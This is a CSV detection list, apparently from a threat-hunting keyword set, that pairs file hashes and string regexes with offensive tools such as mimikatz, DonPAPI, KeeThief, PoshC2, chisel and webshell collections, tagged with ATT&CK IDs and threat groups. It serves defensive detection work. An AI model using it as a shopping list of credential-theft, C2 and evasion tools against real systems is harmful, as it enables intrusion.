"*c1f26f34840d12e1daeb6ee4362ae1582b564e0c1b6c6762f943dc521c694b69*",".{0,1000}c1f26f34840d12e1daeb6ee4362ae1582b564e0c1b6c6762f943dc521c694b69.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","36760"
"*c1f50e0f88bd6dbb961180b7c9845ba431112e894c22554a581364e326ddc94c*",".{0,1000}c1f50e0f88bd6dbb961180b7c9845ba431112e894c22554a581364e326ddc94c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","36761"
"*c1f6cbbbf283dd122b10ec6bfbda0799703bea9465efc5673e71f7fd6951be09*",".{0,1000}c1f6cbbbf283dd122b10ec6bfbda0799703bea9465efc5673e71f7fd6951be09.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36762"
"*c1f971aa959ea7722c8bc41a6677ad83230e129d69424c16835c3d000756582e*",".{0,1000}c1f971aa959ea7722c8bc41a6677ad83230e129d69424c16835c3d000756582e.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","36763"
"*c1fb599493390e17676176219c5cdd8f4b4bca43696b6a54ded88c9b28f741ff*",".{0,1000}c1fb599493390e17676176219c5cdd8f4b4bca43696b6a54ded88c9b28f741ff.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","#filehash","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","36764"
"*C2 Client*",".{0,1000}C2\sClient.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","36766"
"*C2 Framework for villains*",".{0,1000}C2\sFramework\sfor\svillains.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","36767"
"*C2 Nimplant Server*",".{0,1000}C2\sNimplant\sServer.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","36768"
"*c2 target,eg 127.0.0.1:64535*",".{0,1000}c2\starget,eg\s127\.0\.0\.1\:64535.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","36769"
"*c2.hak5.org*",".{0,1000}c2\.hak5\.org.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","1","N/A","N/A","10","9","N/A","N/A","N/A","N/A","36770"
"*C2.KillDate*",".{0,1000}C2\.KillDate.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","36771"
"*c2.striker.*",".{0,1000}c2\.striker\..{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","36772"
"*C2.UserAgent*",".{0,1000}C2\.UserAgent.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","36773"
"*C2/C2Server.*",".{0,1000}C2\/C2Server\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","36774"
"*C2_RPC_functions.py*",".{0,1000}C2_RPC_functions\.py.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","36775"
"*c2_server*.py*",".{0,1000}c2_server.{0,1000}\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","36776"
"*c2_server.py *",".{0,1000}c2_server\.py\s.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","36777"
"*c2_server.resources*",".{0,1000}c2_server\.resources.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","36778"
"*C2_Server-main*",".{0,1000}C2_Server\-main.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","36779"
"*c2_service.sh*",".{0,1000}c2_service\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","36780"
"*c2016dbd1bce8c6e38097264c6e0f96a55858c57dcee4e9d53be6d1a6e4705c9*",".{0,1000}c2016dbd1bce8c6e38097264c6e0f96a55858c57dcee4e9d53be6d1a6e4705c9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","36781"
"*c209bedad717b0db49a7109c3b4dec90cfad5d58dbfe7e8c32f828c61494bc60*",".{0,1000}c209bedad717b0db49a7109c3b4dec90cfad5d58dbfe7e8c32f828c61494bc60.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36782"
"*c2109f44079ae2c753b2f2763562c141d7db57a33649baa7086b204109a98d25*",".{0,1000}c2109f44079ae2c753b2f2763562c141d7db57a33649baa7086b204109a98d25.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#filehash","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","36785"
"*c2268ac17f1df0139ec5aa11da1ae6b8bef2ad3588f31d8e62c85a55cf85b073*",".{0,1000}c2268ac17f1df0139ec5aa11da1ae6b8bef2ad3588f31d8e62c85a55cf85b073.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#filehash","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","36787"
"*c235329bd192781dad37dc190bbce353f3f7ade3a98b6d1c79e2ab69a91f26ff*",".{0,1000}c235329bd192781dad37dc190bbce353f3f7ade3a98b6d1c79e2ab69a91f26ff.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","36788"
"*c23628bad8bfff013fe5d96f50013c838c5900962550a86521e3063879a1bf9e*",".{0,1000}c23628bad8bfff013fe5d96f50013c838c5900962550a86521e3063879a1bf9e.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","36790"
"*C23B51C4-2475-4FC6-9B3A-27D0A2B99B0F*",".{0,1000}C23B51C4\-2475\-4FC6\-9B3A\-27D0A2B99B0F.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#GUIDproject","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","36791"
"*c23c160ea84911fa0041045b64551322f282d2d68b5c2689c4bd992c2f7c9267*",".{0,1000}c23c160ea84911fa0041045b64551322f282d2d68b5c2689c4bd992c2f7c9267.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#filehash","Dispossessor samples","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","36792"
"*c2494e6e5e6496d3d04fb69927a25c8cead06e68cd2d4005ee4b3853770ece4f*",".{0,1000}c2494e6e5e6496d3d04fb69927a25c8cead06e68cd2d4005ee4b3853770ece4f.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","36793"
"*c24e0fea42a4e92ab55ff814ca3c5691a9bd0cdcd923db5ca96862a580757316*",".{0,1000}c24e0fea42a4e92ab55ff814ca3c5691a9bd0cdcd923db5ca96862a580757316.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36794"
"*c254090da39e70c2a20291aee65043f470acc77d7e6dede2ccc4784d75c024c4*",".{0,1000}c254090da39e70c2a20291aee65043f470acc77d7e6dede2ccc4784d75c024c4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36796"
"*c254dc53b3cf9c7d81d92f4e060a5c44a4f51a228049fd1e2d90fafa9c0a44ee*",".{0,1000}c254dc53b3cf9c7d81d92f4e060a5c44a4f51a228049fd1e2d90fafa9c0a44ee.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","36797"
"*c254dc53b3cf9c7d81d92f4e060a5c44a4f51a228049fd1e2d90fafa9c0a44ee*",".{0,1000}c254dc53b3cf9c7d81d92f4e060a5c44a4f51a228049fd1e2d90fafa9c0a44ee.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","36798"
"*c257234e783ab69c48d2d5b9b411edccfe5b0b1d7c2aa96d77c34e095bb88ac9*",".{0,1000}c257234e783ab69c48d2d5b9b411edccfe5b0b1d7c2aa96d77c34e095bb88ac9.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36799"
"*c25ff60d4286c239522b0b0292c801a5711ec994fa90429adf7d57ed8735bb07*",".{0,1000}c25ff60d4286c239522b0b0292c801a5711ec994fa90429adf7d57ed8735bb07.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","36802"
"*c2635225a206bbd00ab89ef7e8418acdee38e2f2969be43c9d04031f3fbb0e14*",".{0,1000}c2635225a206bbd00ab89ef7e8418acdee38e2f2969be43c9d04031f3fbb0e14.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","36803"
"*c2635225a206bbd00ab89ef7e8418acdee38e2f2969be43c9d04031f3fbb0e14*",".{0,1000}c2635225a206bbd00ab89ef7e8418acdee38e2f2969be43c9d04031f3fbb0e14.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","36804"
"*c2656885d23a89c0ce5ecb131762889fe7c39ff2cf4a8b6d8db2c9d782fb94bd*",".{0,1000}c2656885d23a89c0ce5ecb131762889fe7c39ff2cf4a8b6d8db2c9d782fb94bd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","36805"
"*c26e4d825f8e7f7ac40efbebe1302ca8fd4a5b76b3f2969ab5cad764565dfc9c*",".{0,1000}c26e4d825f8e7f7ac40efbebe1302ca8fd4a5b76b3f2969ab5cad764565dfc9c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36807"
"*c26ec6ee7d0d59e1db1f8934b903bd667901875ce09379e873178f6142bf4cea*",".{0,1000}c26ec6ee7d0d59e1db1f8934b903bd667901875ce09379e873178f6142bf4cea.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","36808"
"*c27a1a9ed68825e382cdd8db8da2c5139a431d36c300f95bf8e0e7a04af88b2d*",".{0,1000}c27a1a9ed68825e382cdd8db8da2c5139a431d36c300f95bf8e0e7a04af88b2d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","36809"
"*c27a8cb8c4a97bbd0898799f3449d0f0a659360fc56cb43e0755bfeb25939241*",".{0,1000}c27a8cb8c4a97bbd0898799f3449d0f0a659360fc56cb43e0755bfeb25939241.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","36810"
"*c27eaa1709a00ec0c47d47b8c6c061b2f63223d8553fa7d7baa40f7cea903b8f*",".{0,1000}c27eaa1709a00ec0c47d47b8c6c061b2f63223d8553fa7d7baa40f7cea903b8f.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","36812"
"*c288394f0c71cea2f14223899de957ca2a5d101bcbfe1efacc23e480fabde335*",".{0,1000}c288394f0c71cea2f14223899de957ca2a5d101bcbfe1efacc23e480fabde335.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#filehash","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","36814"
"*c28894e4ab24d142a072fdbfddde4dfbfcaba9bfc741a00e935e596ac8c2b3d3*",".{0,1000}c28894e4ab24d142a072fdbfddde4dfbfcaba9bfc741a00e935e596ac8c2b3d3.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","36815"
"*c28b90220de9396746da9507ee9e7dce146c67781cd3a176c6394b52655d60d9*",".{0,1000}c28b90220de9396746da9507ee9e7dce146c67781cd3a176c6394b52655d60d9.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","36816"
"*c2935d032a38a5a6d3251d22b9d93d08223b8dbf90efedbb0e6716cdafe76367*",".{0,1000}c2935d032a38a5a6d3251d22b9d93d08223b8dbf90efedbb0e6716cdafe76367.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","36818"
"*c299346734b17df1a8dc47d97145c756938307fbd249837ff4dc697befd2961b*",".{0,1000}c299346734b17df1a8dc47d97145c756938307fbd249837ff4dc697befd2961b.{0,1000}","offensive_tool_keyword","MSSprinkler","password spraying utility for organizations to test their M365 accounts from an external perspective. It employs a 'low-and-slow' approach","T1110.003 - T1110.001","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/TheresAFewConors/MSSprinkler","1","0","#filehash","N/A","9","1","74","7","2025-02-25T13:32:41Z","2024-09-15T09:54:53Z","36819"
"*c2a3763c4079c3c9671d1511d6ad8df2b544d0eefbbfd138aa327000a5eb1ec1*",".{0,1000}c2a3763c4079c3c9671d1511d6ad8df2b544d0eefbbfd138aa327000a5eb1ec1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","36821"
